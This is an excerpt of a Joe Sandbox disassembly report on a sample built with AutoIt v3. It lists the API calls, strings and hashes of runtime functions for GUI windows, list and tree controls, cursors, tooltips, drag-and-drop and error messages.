SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F928EF
GetSystemMetrics.USER32(00000008), ref: 00F928F7
GetSystemMetrics.USER32(00000004), ref: 00F9291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F92939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F92949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F9297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F92990
GetClientRect.USER32(00000000,000000FF), ref: 00F929AE
GetStockObject.GDI32(00000011), ref: 00F929CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F929D5

Part of subcall function 00F92344: GetCursorPos.USER32(?), ref: 00F92357
Part of subcall function 00F92344: ScreenToClient.USER32(010557B0,?), ref: 00F92374
Part of subcall function 00F92344: GetAsyncKeyState.USER32(00000001), ref: 00F92399
Part of subcall function 00F92344: GetAsyncKeyState.USER32(00000002), ref: 00F923A7

SetTimer.USER32(00000000,00000000,00000028,00F91256), ref: 00F929FC

Strings

AutoIt v3 GUI, xrefs: 00F92974

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 661e14555eda95be4e61417da49fc3cba5bd52302f39d4bde79302a55e627cc6
Instruction ID: 465e7416a99e1279b736efe122b21a77873b4263dd35a71b560c9113d1616d24
Opcode Fuzzy Hash: 661e14555eda95be4e61417da49fc3cba5bd52302f39d4bde79302a55e627cc6
Instruction Fuzzy Hash: E1B16F71A0020AEFEF24DFA8DD45BAE7BB4FB08310F104129FA55E7294DB79A841DB50

Function 01013DE2 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 01013E6F
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 01013F2F

Strings

GETSELECTEDCOUNT, xrefs: 01013F12
FINDITEM, xrefs: 010140A2
SELECTALL, xrefs: 01013F96
ISSELECTED, xrefs: 01013F3A
SELECTINVERT, xrefs: 01013FFF
GETTEXT, xrefs: 01013ED8
GETSELECTED, xrefs: 0101405D
VIEWCHANGE, xrefs: 010140EE
GETSUBITEMCOUNT, xrefs: 01013EBA
SELECT, xrefs: 01013FC9
DESELECT, xrefs: 0101401D
GETITEMCOUNT, xrefs: 01013EA1
SELECTCLEAR, xrefs: 01013FAE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 9363c2e3abe24dd49239408d3bb0506cc140a9bfbf51a6ca53f539fd932d5541
Instruction ID: f745929ceba84ec78f0a0e6900eed76b4c3341a084263a50000b069ea6fac635
Opcode Fuzzy Hash: 9363c2e3abe24dd49239408d3bb0506cc140a9bfbf51a6ca53f539fd932d5541
Instruction Fuzzy Hash: 12A18C302183019BDB14FF29CC52A6AB7E9BF84324F15486CB8D69B2D6DB79EC05CB51

Function 00FEA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00FEA47A
__swprintf.LIBCMT ref: 00FEA51B
_wcscmp.LIBCMT ref: 00FEA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FEA583
_wcscmp.LIBCMT ref: 00FEA5BF
GetClassNameW.USER32(?,?,00000400), ref: 00FEA5F6
GetDlgCtrlID.USER32(?), ref: 00FEA648
GetWindowRect.USER32(?,?), ref: 00FEA67E
GetParent.USER32(?), ref: 00FEA69C
ScreenToClient.USER32(00000000), ref: 00FEA6A3
GetClassNameW.USER32(?,?,00000100), ref: 00FEA71D
_wcscmp.LIBCMT ref: 00FEA731
GetWindowTextW.USER32(?,?,00000400), ref: 00FEA757
_wcscmp.LIBCMT ref: 00FEA76B

Part of subcall function 00FB362C: _iswctype.LIBCMT ref: 00FB3634

Strings

%s%u, xrefs: 00FEA515

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: fc00612b7f331bb8002862e5f5a16c749a1a1767aeaa41aadec8ae5cfea279c7
Instruction ID: 8e132dcc4e64766b30ce99746a1f7c7f98349949f10dc46495cf9427aa73b52e
Opcode Fuzzy Hash: fc00612b7f331bb8002862e5f5a16c749a1a1767aeaa41aadec8ae5cfea279c7
Instruction Fuzzy Hash: FAA1E131604746AFD714DF62C884FAAB7E8FF44324F048629F999C2190EB34F959DB92

Function 00FEAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00FEAF18
_wcscmp.LIBCMT ref: 00FEAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00FEAF51
CharUpperBuffW.USER32(?,00000000), ref: 00FEAF6E
_wcscmp.LIBCMT ref: 00FEAF8C
_wcsstr.LIBCMT ref: 00FEAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00FEAFD5
_wcscmp.LIBCMT ref: 00FEAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00FEB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00FEB055
_wcscmp.LIBCMT ref: 00FEB065
GetClassNameW.USER32(00000010,?,00000400), ref: 00FEB08D
GetWindowRect.USER32(00000004,?), ref: 00FEB0F6

Strings

@, xrefs: 00FEAEF9
ThumbnailClass, xrefs: 00FEAFE0, 00FEB060

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 59964402bdbcf5396efe697d64dd9a1f6d127b997a4336abacdec1220c625f9a
Instruction ID: 6a30f98acd3d7cce7fbd22db97960ab4b3df9cf1b559017a0a1b00b9dc42385f
Opcode Fuzzy Hash: 59964402bdbcf5396efe697d64dd9a1f6d127b997a4336abacdec1220c625f9a
Instruction Fuzzy Hash: 9181B2715083869FDB11DF12C885BAB77D8EF44324F04846AFD858A095DB38ED49DBA2

Function 00FEABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FEAC33

Strings

[CLASS:, xrefs: 00FEAC83
[REGEXPTITLE:, xrefs: 00FEAC5B
LAST, xrefs: 00FEABF8
[LAST, xrefs: 00FEACE0
[ALL, xrefs: 00FEACD9
[ACTIVE, xrefs: 00FEAC20
ACTIVE, xrefs: 00FEAC0E
REGEXP=, xrefs: 00FEAC48
HANDLE=, xrefs: 00FEAC2C
[HANDLE:, xrefs: 00FEAC3F
CLASSNAME=, xrefs: 00FEAC70
ALL, xrefs: 00FEACC7

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 54e925ff118648d462c0ae90683d8aa3a84b7a88178d3cce791735ce3bebb6e3
Instruction ID: 74b53f3e82ffb34ee0e874b5785eb3dd5cb781631d29b3be91727654f7b6a060
Opcode Fuzzy Hash: 54e925ff118648d462c0ae90683d8aa3a84b7a88178d3cce791735ce3bebb6e3
Instruction Fuzzy Hash: 7C31E371944349ABEB10FAA6DD83EFE7764AF50720F700428F442750D1EF55AF14EA52

Function 01004FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 01005013
LoadCursorW.USER32(00000000,00007F00), ref: 0100501E
LoadCursorW.USER32(00000000,00007F03), ref: 01005029
LoadCursorW.USER32(00000000,00007F8B), ref: 01005034
LoadCursorW.USER32(00000000,00007F01), ref: 0100503F
LoadCursorW.USER32(00000000,00007F81), ref: 0100504A
LoadCursorW.USER32(00000000,00007F88), ref: 01005055
LoadCursorW.USER32(00000000,00007F80), ref: 01005060
LoadCursorW.USER32(00000000,00007F86), ref: 0100506B
LoadCursorW.USER32(00000000,00007F83), ref: 01005076
LoadCursorW.USER32(00000000,00007F85), ref: 01005081
LoadCursorW.USER32(00000000,00007F82), ref: 0100508C
LoadCursorW.USER32(00000000,00007F84), ref: 01005097
LoadCursorW.USER32(00000000,00007F04), ref: 010050A2
LoadCursorW.USER32(00000000,00007F02), ref: 010050AD
LoadCursorW.USER32(00000000,00007F89), ref: 010050B8
GetCursorInfo.USER32(?), ref: 010050C8

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 5d79493e5cb86076edf87a27550d86d9ca2ee6b47fe98daea1f314f9ef0b22e3
Instruction ID: 37912ea06b63cd42eb38e66964c429ec41f02521a3b0e48d1f822cd8d60a8b95
Opcode Fuzzy Hash: 5d79493e5cb86076edf87a27550d86d9ca2ee6b47fe98daea1f314f9ef0b22e3
Instruction Fuzzy Hash: 863117B1D483196AEF509FBA8C8989EBFE8FF04750F50452AA54CE7280DA7865008F91

Function 0101A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101A259
DestroyWindow.USER32(?,?), ref: 0101A2D3

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0101A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0101A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101A382
DestroyWindow.USER32(00000000), ref: 0101A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F90000,00000000), ref: 0101A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0101A3F4
GetDesktopWindow.USER32 ref: 0101A40D
GetWindowRect.USER32(00000000), ref: 0101A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0101A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0101A444

Part of subcall function 00F925DB: GetWindowLongW.USER32(?,000000EB), ref: 00F925EC

Strings

tooltips_class32, xrefs: 0101A346, 0101A3D4
0, xrefs: 0101A26F

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 7a7f0a3691c0f29a9a1cecaf97286ab77b28525df087654316549bbf57ef7d5f
Instruction ID: 084d468fbc09508c46b519a0298891009bf4f2d0f39d40ace53a6581454bbf6f
Opcode Fuzzy Hash: 7a7f0a3691c0f29a9a1cecaf97286ab77b28525df087654316549bbf57ef7d5f
Instruction Fuzzy Hash: C3718A70240345AFEB21CF28CC49F6A7BE5FB88304F04495CF9C59B2A4DB79A906CB52

Function 0101C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

DragQueryPoint.SHELL32(?,?), ref: 0101C627

Part of subcall function 0101AB37: ClientToScreen.USER32(?,?), ref: 0101AB60
Part of subcall function 0101AB37: GetWindowRect.USER32(?,?), ref: 0101ABD6
Part of subcall function 0101AB37: PtInRect.USER32(?,?,0101C014), ref: 0101ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0101C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0101C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0101C6BE
_wcscat.LIBCMT ref: 0101C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0101C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0101C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0101C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0101C757
DragFinish.SHELL32(?), ref: 0101C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0101C851

Strings

@GUI_DRAGFILE, xrefs: 0101C800
@GUI_DRAGID, xrefs: 0101C7C9
@GUI_DROPID, xrefs: 0101C77E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 41d80680c92bcdc078e14e7e34a67a6b66f2d7bf1d6b99c8a8d51617274e1f58
Instruction ID: dac99248f85a282a6bb8bb23612236cac6a52e1b7e0d1b71f688a1a5ad2003b7
Opcode Fuzzy Hash: 41d80680c92bcdc078e14e7e34a67a6b66f2d7bf1d6b99c8a8d51617274e1f58
Instruction Fuzzy Hash: 39617A71108301AFDB11EF64DC85DAFBBE8FF89750F00091EF691961A1DB79AA09CB52

Function 01014392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 01014424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0101446F

Strings

EXISTS, xrefs: 010144D8
EXPAND, xrefs: 01014521
ISCHECKED, xrefs: 010145F2
UNCHECK, xrefs: 0101464B
GETSELECTED, xrefs: 0101457F
GETTOTALCOUNT, xrefs: 01014456
CHECK, xrefs: 0101448F
SELECT, xrefs: 01014620
GETTEXT, xrefs: 010145C2
GETITEMCOUNT, xrefs: 01014551
COLLAPSE, xrefs: 010144B5

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 60924e45f84060fa03d14a35196c0e0b3ccd5a46eb14fa0a6fb06b191d27180b
Instruction ID: 179259aeea1bb0752ac25d442e4b7fa3f369453bb5a31bfbab701641a6fc5baa
Opcode Fuzzy Hash: 60924e45f84060fa03d14a35196c0e0b3ccd5a46eb14fa0a6fb06b191d27180b
Instruction Fuzzy Hash: 4E918C702043018BDB04EF24C851A6EB7E5BF98354F45486CE8D69B3A2DB78ED09DB91

Function 0101B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0101B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010191C2), ref: 0101B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0101B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0101B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0101B9C3
FreeLibrary.KERNEL32(?), ref: 0101B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0101B9DF
DestroyIcon.USER32(?,?,?,?,?,010191C2), ref: 0101B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0101BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0101BA17

Part of subcall function 00FB2EFD: __wcsicmp_l.LIBCMT ref: 00FB2F86

Strings

.exe, xrefs: 0101B84A
.dll, xrefs: 0101B86D
.icl, xrefs: 0101B82A

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 98d9550bcf6875f10550191997bc234dd4cc30af5f0ad4fa2968cd6120ecdf7b
Instruction ID: f61bf348c9626e38e260d19d8060df0469d0dc74472e0f7ccbaae22de5c915dc
Opcode Fuzzy Hash: 98d9550bcf6875f10550191997bc234dd4cc30af5f0ad4fa2968cd6120ecdf7b
Instruction Fuzzy Hash: F561CC71900219BAEB24DF69CC41BBE7BB8FB08B10F104259FD55D61C1DB7D9A81DBA0

Function 00FF9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00FF9C7F

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00FF9CA0
__swprintf.LIBCMT ref: 00FF9CF9
__swprintf.LIBCMT ref: 00FF9D12
_wprintf.LIBCMT ref: 00FF9DB9
_wprintf.LIBCMT ref: 00FF9DD7

Strings

Line %d (File "%s"):, xrefs: 00FF9CF3, 00FF9D0C
Incorrect parameters to object property !, xrefs: 00FF9D5B
Error: , xrefs: 00FF9D81
"%s" (%d) : ==> %s:, xrefs: 00FF9DD2
^ ERROR , xrefs: 00FF9D4E
"%s" (%d) : ==> %s:%s%s, xrefs: 00FF9DB4

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: abcd2871da597a847e61ee9738987892a257963ce74c6a05671807ac3242c061
Instruction ID: f94d4a2efd8cfe50dd12d3ccbff547acddc46d3d53c8ac204766e2431fbc2f64
Opcode Fuzzy Hash: abcd2871da597a847e61ee9738987892a257963ce74c6a05671807ac3242c061
Instruction Fuzzy Hash: 97517E7190030AAAEF15FBE0DD86EEEB778AF18300F600165B50576061EB796E58EB60

Function 00FFA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

CharLowerBuffW.USER32(?,?), ref: 00FFA3CB
GetDriveTypeW.KERNEL32 ref: 00FFA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FFA4C5

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Strings

close cd wait, xrefs: 00FFA4B0
open , xrefs: 00FFA427
set cd door , xrefs: 00FFA466
type cdaudio alias cd wait, xrefs: 00FFA443
closed, xrefs: 00FFA3DF, 00FFA3E8
open, xrefs: 00FFA3F2
wait, xrefs: 00FFA482
close, xrefs: 00FFA3D1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 571e007c6ee144a6dcba55d209f6b101e6dbcc9944aef798e7794ea9f9a8f871
Instruction ID: 91115ab4c283e53778358fc9a9b397c573232e2e2a0c6c3e8edc6b87d49f509c
Opcode Fuzzy Hash: 571e007c6ee144a6dcba55d209f6b101e6dbcc9944aef798e7794ea9f9a8f871
Instruction Fuzzy Hash: 57518DB15183059FDB00EF25CC8196AB3E8FF88718F14886DF88A97261DB75ED09DB42

Function 00FEF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00FCE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00FEF8DF
LoadStringW.USER32(00000000,?,00FCE029,00000001), ref: 00FEF8E8

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

GetModuleHandleW.KERNEL32(00000000,01055310,?,00000FFF,?,?,00FCE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00FEF90A
LoadStringW.USER32(00000000,?,00FCE029,00000001), ref: 00FEF90D
__swprintf.LIBCMT ref: 00FEF95D
__swprintf.LIBCMT ref: 00FEF96E
_wprintf.LIBCMT ref: 00FEFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FEFA2E

Strings

Line %d (File "%s"):, xrefs: 00FEF957
Error: , xrefs: 00FEF9E5
%s (%d) : ==> %s: %s %s, xrefs: 00FEFA12
^ ERROR, xrefs: 00FEF9C3
Line %d:, xrefs: 00FEF968

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

